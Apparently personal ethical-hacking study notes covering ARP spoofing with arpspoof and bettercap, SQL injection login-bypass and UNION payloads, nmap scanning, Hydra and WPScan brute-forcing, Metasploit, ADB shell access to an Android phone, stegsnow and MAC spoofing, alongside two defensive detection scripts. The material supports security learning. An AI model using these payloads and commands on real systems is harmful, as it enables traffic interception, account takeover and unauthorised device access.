Man In The Middle (MITM)

In a man-in-the-middle attack the attacker places himself in the middle of the communication between the victim and another device (a proxy, another server, and so on), intercepting and seeing everything that is transferred between the two.

One of the working methods to achieve a MITM attack is ARP spoofing.

ARP spoofing

ARP stands for Address Resolution Protocol.

ARP spoofing consists in redirecting all the packet traffic using the ARP protocol.

ARP allows a device to exchange data with another device (normally a proxy) by associating the device's IP with its MAC address, using a table (the ARP table) in which every IP is "converted" into a MAC address. This ARP table is saved on every device of the network, so every device knows every "IP – MAC address" pair of all the devices of the network.

The attacker, then, replaces, in the above table of the victim device, the MAC address of the proxy with his own. In this way the victim thinks it is exchanging data with the proxy, but in practice it is exchanging data with the hacker. Do you know the movie "Face/Off"?…

To show this ARP table, open your CLI and type (on whatever OS):

arp -a

the result is a list of matches in the form (<IP>) at <MAC address>

root@kali:~# arp -a
_gateway ( at e4:8f:34:37:ba:04 [ether] on eth0
Giuseppes-MBP.station ( at a4:83:e7:0b:37:38 [ether] on eth0
GiuseppBPGrande.station ( at 3c:22:fb:b8:8c:c6 [ether] on eth0

In our example the router is ( at e4:8f:34:37:ba:04 and the victim is ( at a4:83:e7:0b:37:38

The MITM will try to impersonate the router in the ARP table of the victim.

To do so we can use arpspoof.

With arpspoof we need to modify two ARP tables: the one of the victim and the one of the gateway:

arpspoof -i <interface> -t <victimip> <gatewayip>

arpspoof -i <interface> -t <gatewayip> <victimip>

Now we enable IP forwarding. We do that so that the packets flowing through our device don't get dropped: each packet that goes through our device actually gets forwarded to its destination. So, when we get a packet from the client, it goes to the router, and when a packet comes from the router, it goes to the client without being dropped on our device. We enable it using this command:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

The Windows device now thinks that the attacker device is the access point, and whenever the Windows device tries to communicate with the access point, it sends all these requests to the attacker device. This places our attacker device in the middle of the connection, and we are able to read all the packets, modify them, or drop them.
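As an added example (not part of the original notes), this Python script parses the output of arp -a and flags, on the victim's side, the two symptoms of the spoof described above: the gateway's MAC changing from a known-good value, and one MAC claiming several IPs. The IPs in the sample cache are invented; the MACs are the ones from the arp -a output above.

```python
import re

# Linux net-tools "arp -a" line, e.g. "_gateway (192.168.1.1) at e4:8f:34:37:ba:04 [ether] on eth0".
# The pattern also accepts the macOS form (unpadded octets, no "[ether]").
ARP_LINE = re.compile(
    r"^(?P<host>\S+) \((?P<ip>\d+\.\d+\.\d+\.\d+)\) at "
    r"(?P<mac>[0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5})\b"
)


def normalise_mac(mac: str) -> str:
    """Zero-pad each octet and lower-case, so ba:4 and BA:04 compare equal."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))


def parse_arp(output: str) -> dict:
    """Return {ip: mac} from the text printed by `arp -a`; incomplete entries are skipped."""
    table = {}
    for line in output.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = normalise_mac(m.group("mac"))
    return table


def detect_arp_spoof(table: dict, gateway_ip: str, trusted_gateway_mac: str) -> list:
    """Two checks a host can run on its own ARP cache:
    1. the gateway IP must still map to the MAC recorded when the network was known clean;
    2. one MAC must not own several IPs: during a full-duplex spoof the attacker's NIC
       answers for the gateway while still holding its own address, which is exactly that."""
    alerts = []
    expected = normalise_mac(trusted_gateway_mac)
    current = table.get(gateway_ip)
    if current is not None and current != expected:
        alerts.append(f"gateway {gateway_ip} is now at {current}, expected {expected}")
    ips_by_mac = {}
    for ip, mac in table.items():
        ips_by_mac.setdefault(mac, []).append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}")
    return alerts


# Constructed samples (IPs invented; MACs taken from the page's arp -a output).
CLEAN_CACHE = """\
_gateway (192.168.1.1) at e4:8f:34:37:ba:04 [ether] on eth0
GiuseppBPGrande.station (192.168.1.10) at 3c:22:fb:b8:8c:c6 [ether] on eth0
? (192.168.1.50) at <incomplete> on eth0
"""
# The victim's cache while the host at 192.168.1.10 is answering for the gateway.
POISONED_CACHE = CLEAN_CACHE.replace("e4:8f:34:37:ba:04", "3c:22:fb:b8:8c:c6")

if __name__ == "__main__":
    for name, cache in (("clean", CLEAN_CACHE), ("poisoned", POISONED_CACHE)):
        print(name, detect_arp_spoof(parse_arp(cache), "192.168.1.1", "e4:8f:34:37:ba:04"))
```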


Another way to impersonate a device in the victim's ARP table is the tool bettercap.

How to use it:

bettercap -iface <networkinterface>

Then you need to specify a module. In our case we need to enable the net.probe module (to discover devices on the network):

 >  » net.probe on
 >  » [02:09:18] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
 >  » [02:09:18] [sys.log] [inf] net.probe probing 256 addresses on
 >  » [02:09:18] [] endpoint detected as a4:83:e7:0b:37:38 (Apple, Inc.).
 >  » [02:09:18] [] endpoint detected as 3c:22:fb:b8:8c:c6 (Apple, Inc.).
 >  » [02:09:18] [] endpoint detected as 74:d4:23:c0:e4:88.
 >  » [02:09:18] [] endpoint detected as 80:0c:f9:a2:b0:5e.
 >  » [02:09:19] [] endpoint detected as 80:35:c1:52:d8:e3 (Xiaomi Communications Co Ltd).
 >  » [02:09:19] [] endpoint detected as d4:1b:81:15:b0:77 (Chongqing Fugui Electronics Co.,Ltd.).
 >  » [02:09:19] [] endpoint detected as 50:76:af:99:5b:3d (Intel Corporate).
 >  » [02:09:19] [] endpoint detected as b8:27:eb:26:8c:04 (Raspberry Pi Foundation).
 >  » [02:09:20] [] endpoint detected as 20:f4:78:1c:ed:dc (Xiaomi Communications Co Ltd).
 >  » [02:09:20] [] endpoint detected as dc:a6:32:d7:57:da (Raspberry Pi Trading Ltd).
 >  » [02:09:20] [] endpoint detected as 5a:92:d0:37:82:da.
 >  » [02:09:26] [] endpoint detected as 88:66:5a:3d:13:76 (Apple, Inc.).
 >  » [02:09:28] [] endpoint detected as 8e:c0:78:29:bd:34.

After that we can see all the IPs and MAC addresses that were found.

Let's spoof, setting fullduplex to true. This allows redirecting on both sides (from/to the victim and from/to the gateway):

net.sniff on
 >  » set arp.spoof.fullduplex true
 >  » set <victimdeviceIP>
 >  » arp.spoof on

We are now in the middle of the connection.

To capture and analyse what flows through our system as MITM we can run:

 >  » net.sniff on

From this moment everything sent from the victim device will be shown on our screen.

Custom Spoofing script

To avoid typing every single command every time, it is possible to create a script with all these commands together.

Create a text file (for instance spoofcommands.cap) with the list of all commands:

net.probe on
set arp.spoof.fullduplex true
set <victimdeviceIP>
arp.spoof on
net.sniff on

and type the following command:

bettercap -iface <networkinterface> -caplet spoofcommands.cap

SQL Injection

All websites that interact with a DB use SQL.

But if the SQL script is not correctly written, it can be subject to manipulation through the HTML form parameters, in which the attacker can put malicious SQL code.

So finding a SQL injection is very critical, because it gives access to the entire DB as admin.

How to discover SQL Injections

The easy way is to put some special SQL characters in the HTML form input text, like ' (single quote), " (double quote), # (comment) and so on, and see what happens.

We could get multiple results: an exception that shows the query which went wrong, for instance.

Bypassing logins using SQL Injections

In a user/password login page we can set the username and, in the password field, specify a piece of query that continues the login query.

Let's say that the login query is something like this:

select * from users where username='$username' and password='$password'

Where $username and $password are dynamically passed from the frontend.

Now, the login query can be hacked by specifying a piece of SQL as the password.

For instance, the password field could be

password' and 1=1; in this way the query will be

select * from users where username='$username' and password='password' and 1=1

The worst SQL injection could be:

$username = admin (or whatever the admin username is)

$password = 123456' or 1=1

In this case the query becomes:

select * from users where username='admin' and password='123456' or 1=1

Executing that query, assuming that admin is a real admin username, it will always return true, even if the password used is not correct, allowing us to enter as administrator.

Another way to use SQL injection to bypass the login is with a comment just after the username, because whatever is written after the comment is not used.

For instance a query like this:

select * from users where username = 'admin' #and password ='ciccio'

will return the user whose username is admin, whatever the password is.

In order to have a query like the above, in the username we need to specify

$username = admin' #

$password = whateverWeWant

The last query is the most interesting one because it allows us to build more complex queries to gather more information from the database.

For instance we can add a union to get something else:

select * from users where username = 'admin' union select 1, database(), user(), version(), 5 #and password ='whateverWeWant'

In this case we used the following parameters:

$username = admin' union select 1, database(), user(), version(), 5#

$password = whateverWeWant

Or we can get the DB information schema using another query after the union:

$username = admin' union select 1, table_name, null, null, 5 from information_schema.tables#

$password = whateverWeWant

In this way you can get whatever you want from the DB, just by adding a union query with the same number of columns as the first query (in our example select * from users).

Discover SQL Injections

We can use:

  • SQLMap, a CLI tool to automate SQL injections against a specific URL
  • OWASP ZAP, a UI tool, very easy to use, which finds possible SQL injections (but also other types of exploitation) on the entire website, also letting you specify the field parameters to use 🙂

Prevent SQL Injection

To prevent SQL injection in your SQL scripts:

  • filter inputs
  • use parameterised statements!

Scanning and Enumeration

Given the following IP, which hosts are running on this subnet?

netdiscover -r

To show open ports:

nmap <one or more ip addresses or domain names separated by a space>

Scan a specific range



-v verbose details of the scan

-Pn to force the scan even if the IP looks down to ping

-sA to detect firewall settings

-sL to identify hostnames by completing a DNS query for each one

-iL <filename> to scan a list of IPs inside a file

-sS to check stealthily (SYN scan) for open ports without leaving traces on the target machine

-sU to scan for UDP ports

-sn to perform a ping scan, so just to check if the host is up

-p <port list separated by commas or port range separated by a dash> <ip or domain address> to specify the (list of) ports that you want to scan

-A stands for Aggressive. It's the complete scan

-O will tell you the Operating System

-Pn in this case nmap will check the target assuming that the host is alive, so even if the host does not answer ping nmap will check it (no ping scan)


Remote Desktop Protocol is a Windows service which normally runs on port 3389.

So, to know which machine is running RDP, use nmap and look for port 3389 open.

There has been a data breach in the x x y stockbroker office. There are 4 valid employee accounts registered on a machine ( which is used in the stockbroker office: 'guest', 'ceh', 'administrator', 'john'. Find out who the hacker is.

  • So, open RDP with the IP address (admin/aadmin123)
  • then type "net user" to check the users registered on that particular Windows machine.
  • Probably in the list of users that appears there will be an extra user, who is the hacker

Hacking Web Application


wpscan --url <websitetocheck> -e u to check the list of usernames of a WordPress website

wpscan --url <websitetocheck> --usernames <filenameWithUserList> --passwords <filenameWithpasswordList>

wpscan --url <websitetocheck> -u <username> -P <filenameWithpasswordList>


  • msfconsole
  • search <serviceName>
  • use <metasploitServiceName>
  • info (or show options)
  • set <param>
  • run (or exploit)


Hydra is used to test attacks using wordlists on different protocols (FTP, SSH, HTTPS, VNC, POP3, IMAP, ...).

hydra -l <username> -p <password> <ipserver> <service>

for instance

hydra -l root -p rootpass ssh

hydra -L user.txt -p rootpass ssh

hydra -L user.txt -P passlist.txt ssh

Hacking Android platform

Getting access to Android using ADB

Let's first check if that port is open:

nmap <ipAddressOfAndroidDevice> -Pn

the result should be:

PORT     STATE SERVICE
5555/tcp open  freeciv

we can try to connect using the following command:

adb connect <ipAddressOfAndroidDevice>:<port>


adb shell


To encrypt

stegsnow -C -m "super secret message" -p "passwordtousetodecodemessage" originalfile.txt filewithhiddenmessage.txt

To decrypt

stegsnow -C -p "passwordtousetodecodemessage" filewithhiddenmessage.txt



Steganography is the practice of hiding a message inside of (or even on top of) something that is not secret.

Steganography has the double mission of hiding and deceiving.

Of course not only messages can be hidden, but also malware scripts.


There are a lot of tools that can hide things in images, files, and so on.

Snow is one of these.

Snow stands for Steganographic Nature Of Whitespace.

SNOW is a whitespace steganography tool used to embed hidden messages in ASCII text by extending the whitespace at the end of lines. This works because spaces and tabs are not visible to viewers of the text, so the message stays hidden from a casual audience. Even if the extra whitespace is noticed, the hidden message cannot be read when the built-in encryption is used.

Snow is intended to be used on Windows. The Linux version is stegsnow.

To hide a message in a file (let's say readme2.txt) using the content of an existing file (let's say readme.txt):

stegsnow -C -m "super secret message" -p "passwordtousetodecodemessage" originalfile.txt filewithhiddenmessage.txt 

For instance

root@kali:~# stegsnow -C -m "CIAO MAMMA guarda come mi diverto" -p "magic" readme.txt readme2.txt 
Compressed by 30.30%
Message exceeded available space by approximately 776.19%.
An extra 6 lines were added.

where readme.txt has some generic content.

After the command, readme2.txt will contain the content of readme.txt plus some extra spaces and tabs.

To decode the content of readme2.txt:

stegsnow -C -p "passwordtousetodecodemessage" filewithhiddenmessage.txt 

For instance:

root@kali:~# stegsnow -C -p "magic" readme2.txt 
CIAO MAMMA guarda come mi diverto
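As an added defensive example (not from the original notes), this Python script profiles the trailing spaces and tabs that stegsnow appends, flags a file that shows the pattern, and strips the whitespace so any hidden payload is destroyed while the visible text is kept. The sample text is constructed, and the threshold in looks_like_snow is an assumption for the demo, not a property of the tool.

```python
# Constructed sample: two ordinary lines, two lines carrying trailing space/tab runs
# of the kind stegsnow appends, then whitespace-only lines added at the end of the file.
SAMPLE = (
    "This is a normal readme line.\n"
    "Another normal line.\n"
    "Line with hidden payload. \t  \t\n"
    "More payload here.\t \t\t\n"
    " \t \t\n"
    "\t  \t\n"
)


def trailing_ws_profile(text: str) -> dict:
    """Count how lines end. A file produced by stegsnow shows trailing tab/space runs
    on several lines and extra whitespace-only lines appended after the real content
    (compare the tool's own message "An extra 6 lines were added")."""
    lines = text.splitlines()
    with_trailing = with_tabs = hidden_chars = 0
    for line in lines:
        tail = line[len(line.rstrip(" \t")):]  # the invisible part of the line
        if tail:
            with_trailing += 1
            hidden_chars += len(tail)
            if "\t" in tail:
                with_tabs += 1
    trailing_blank = 0
    for line in reversed(lines):  # whitespace-only lines at the very end
        if line.strip(" \t") == "":
            trailing_blank += 1
        else:
            break
    return {"lines": len(lines), "trailing": with_trailing, "with_tabs": with_tabs,
            "hidden_chars": hidden_chars, "trailing_blank_lines": trailing_blank}


def looks_like_snow(text: str, min_tab_lines: int = 2) -> bool:
    """Heuristic (assumption for this demo): editors rarely leave tabs mixed into the
    trailing whitespace of several lines, so that pattern is worth a closer look."""
    return trailing_ws_profile(text)["with_tabs"] >= min_tab_lines


def strip_hidden_whitespace(text: str) -> str:
    """Defensive normalisation: drop trailing spaces/tabs and trailing blank lines.
    Whatever was encoded in the whitespace is gone; the visible text is unchanged."""
    cleaned = [line.rstrip(" \t") for line in text.splitlines()]
    while cleaned and cleaned[-1] == "":
        cleaned.pop()
    return "\n".join(cleaned) + "\n"


if __name__ == "__main__":
    print(trailing_ws_profile(SAMPLE))
    print("suspicious:", looks_like_snow(SAMPLE))
    print(strip_hidden_whitespace(SAMPLE), end="")
```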

Functional Attacks on API Providers

We could have a few security attacks on an API:

  • SQL Injections
  • Fuzzing
  • Cross site forgery
  • Session/token hijacking

SQL Injections

In this attack the attacker tries to identify the input parameters used in a SQL statement in order to manipulate the original query.

Fuzzing

Fuzz testing, or fuzzing, is a black-box software testing technique which consists in injecting random data into a service in order to find bugs.

A fuzzer would try combinations of attacks on:

  • numbers (signed/unsigned integers/float…)
  • chars (urls, command-line inputs)
  • metadata: user-input text (id3 tags)
  • pure binary sequences

A common approach to fuzzing is to define lists of "known-to-be-dangerous values" (fuzz vectors) for each type, and to inject them or recombinations of them:

  • for integers: zero, possibly negative or very big numbers
  • for chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands…)
  • for binary: random ones

The hacker then analyses the response to understand the vulnerability.

So pay attention to which type of error response you send back. Don't send, for instance, a SQL exception error.

Cross site forgery

In this case the hacker is able to execute a script, which calls our API, using the user's device.

To avoid this type of attack: use POST instead of GET, split transactions into multiple steps, add custom headers.

Token and Sessions Hijacking

This is basically a specialisation of cross site forgery, with the goal of getting the token saved on the client device.

So the user somehow executes the attacker's script, which reads the token or the session cookie and uses it to access private resources.

In this case the suggestions are:

  • expire your tokens
  • use a complex token pattern
  • use some additional security headers; do not rely only on access tokens

Getting access to Android using ADB

ADB stands for Android Debug Bridge and it is a CLI used to communicate with an Android device which is physically connected (through a USB cable for instance) to a computer.

Before continuing, check if you have adb installed on your machine by typing adb in the CLI. Normally it is installed together with Android Studio. If it is not installed:

apt-get update
apt install adb

Normally this service is available on port 5555 of the Android device.

Let's first check if that port is open:

nmap <ipAddressOfAndroidDevice> -Pn
root@kali:~# nmap -Pn
Starting Nmap 7.92 ( ) at 2023-07-10 02:17 EDT
Nmap scan report for RedmiNote5-Redmi.station (
Host is up (0.030s latency).
Not shown: 999 closed tcp ports (reset)
5555/tcp open  freeciv
MAC Address: 80:35:C1:52:D8:E3 (Xiaomi Communications)

Nmap done: 1 IP address (1 host up) scanned in 3.91 seconds

If it is not open, try to restart the USB port:

adb usb
adb tcpip 5555

Once it is open we can try to connect using the following command:

adb connect <ipAddressOfAndroidDevice>:<port>

Normally the port is 5555 and it is optional:

root@kali:~# adb connect
connected to

After a successful connection type:

adb shell

Then, the result should be:

root@kali:~# adb shell
whyred:/ $

From this moment you can access the Android device like you do in a normal Linux environment.


Metasploit Framework is a cybersecurity project that provides information about vulnerabilities, simplifies penetration tests and helps in the development of intrusion detection checks.

It is an open source tool and basically executes exploits against a remote machine.

Let’s start

First of all we need to check that our Metasploit is correctly connected to the Metasploit DB. Type the following:


The result will be something like this:

root@kali:~# msfconsole 
  |  METASPLOIT by Rapid7                                 |
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |

       =[ metasploit v6.2.18-dev                          ]
+ -- --=[ 2244 exploits - 1185 auxiliary - 398 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

msf6 > 

From the Metasploit command line (msf6 > in our case) it's possible to execute nmap normally.

How to use Metasploit

We need to execute 3 steps:

Find the service we need (ftp, ssh, ...). Type:

search <serviceYouNeed> (let's say: search ftp)

After choosing your service, we search more deeply for the correct module to use:

info scanner/ftp/

Then, if we need to know which version of ftp my target is using, we call the module using the "use" command:

use auxiliary/scanner/ftp/ftp_version
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) >

and then, to know the interface of the module, we type:

info (or: show options)

The result shows the list of the params of that service:

msf6 auxiliary(scanner/ftp/ftp_version) > info

       Name: FTP Version Scanner
     Module: auxiliary/scanner/ftp/ftp_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  hdm <>

Check supported:

Basic options:
  Name     Current Setting      Required  Description
  ----     ---------------      --------  -----------
  FTPPASS                       no        The password for the specified username
  FTPUSER  anonymous            no        The username to authenticate as
  RHOSTS                        yes       The target host(s), see
  RPORT    21                   yes       The target port (TCP)
  THREADS  1                    yes       The number of concurrent threads (max one per host)

  Detect FTP Version.

The required and not-required params are shown. Also, the required ones can have a default value, so in that case it's not mandatory to set that param.

To set a param we use “set” command:

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS
msf6 auxiliary(scanner/ftp/ftp_version) > 

To execute the service type the “run” command (or the “exploit” command):

msf6 auxiliary(scanner/ftp/ftp_version) > run

and this is the result:

[+]      - FTP Banner: '220 ProFTPD Server (Debian) [::ffff:]\x0d\x0a'
[*]      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > 

To recap, the (minimum) ordered list of commands to execute a module in Metasploit is:

  • msfconsole
  • search <serviceName>
  • use <metasploitServiceName>
  • info (or show options)
  • set <param>
  • run (or exploit)

WP Scan

WPScan is a tool designed to test the security of a WordPress web site.

To use it, simply type:

wpscan --url <websitetocheck>

Adding the -e u parameter, it will also try to find users:

wpscan --url <websitetocheck> -e u

It's also possible to brute force users and passwords using --usernames <filenameWithUserList> --passwords <filenameWithpasswordList>

If you already know the username: -u <username> -P <filenameWithpasswordList>

NMAP, discover devices on the (same) network

There are different tools that can discover devices connected on the same network.

The simplest one is netdiscover.

Let's check our subnet first. Type:


to discover our IP address and so our subnet.

let’s say that our ipaddress is

Our subnet is 192.168.1, so all the other devices connected to the same subnet are in the following range <== it means from to

To discover all the other devices connected to the same subnet using netdiscover, type:

netdiscover -r

The result will show you the list of all connected devices:

 Currently scanning: Finished!   |   Screen View: Unique Hosts
 33 Captured ARP Req/Rep packets, from 12 hosts.   Total size: 2094

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
                 e4:8f:34:37:ba:04     20    1200  Vodafone Italia S.p.A.
                 3c:22:fb:b8:8c:c6      1      60  Apple, Inc.
                 5a:92:d0:37:82:da      1      60  Unknown vendor
                 c8:6c:3d:96:65:96      1     174  Amazon Technologies Inc.
                 74:d4:23:c0:e4:88      2     120  Unknown vendor
                 7c:8b:ca:1b:d8:31      1      60  TP-LINK TECHNOLOGIES CO.,LTD.
                 20:f4:78:1c:ed:dc      1      60  Xiaomi Communications Co Ltd
                 7c:8b:ca:1b:d8:31      1      60  TP-LINK TECHNOLOGIES CO.,LTD.
                 80:35:c1:52:d8:e3      1      60  Xiaomi Communications Co Ltd
                 38:1f:8d:ed:70:d2      1      60  Tuya Smart Inc.
                 80:0c:f9:a2:b0:5e      1      60  Amazon Technologies Inc.
                 b8:27:eb:26:8c:04      2     120  Raspberry Pi Foundation

The netdiscover tool shows the IP address, the MAC address and the vendor of each device.

A more powerful tool is nmap.

nmap stands for Network Mapper, and is a tool, like netdiscover, that finds devices in your network but shows more information than netdiscover, like open ports, services, OS version, ...

The visual interface tool for nmap is Zenmap

With Zenmap you can choose graphically which nmap command to use.

With Zenmap you can choose different types of scan, for instance, and it basically translates your choice into an nmap command.

For instance, if you choose the "Quick scan plus" option it will execute the command

nmap -sV -T4 -O -F --version-light

With nmap you can scan a single website or multiple ones as well, to check the exposed ports and services.

For instance, to check google's open ports and services you can type


Detect firewall

sudo nmap -sA <ipaddress>

To identify hostnames

sudo nmap -sL <ipaddress>

We use the "sL" option to find hostnames for the given hosts by completing a DNS query for each one.

MAC Address

MAC stands for Media Access Control.

It is a permanent, physical, unique (in the world) "code" assigned to a physical object that allows it to connect to a network. This code is the address assigned by the device manufacturer.

This address never changes. It will be always the same.

The mac address is used to identify devices on the network.

So every packet that is sent in the network has a source MAC address and a destination MAC address.

Why to change MAC address

  • Because of the above, changing your MAC address makes you anonymous in the network,
  • If there is a filter in the network configuration you can bypass it,
  • You can "impersonate" another device by changing your MAC to the one of the device you want to impersonate.

How to change the MAC address

First of all let's check which network interfaces we have. Let's execute the following command:


The result will contain all your network interfaces.

The MAC address is the code just after the ether label, in the form xx:xx:xx:xx:xx:xx.

In order to change it, first we must disable that interface, with the following command:

ifconfig <interfacename> down

Then we change the MAC address, specifying that we want to change the hardware address ("hw ether"):

ifconfig <interfacename> hw ether 00:11:22:33:44:55

Finally we enable the network interface:

ifconfig <interfacename> up

The original MAC address is back once the device is restarted.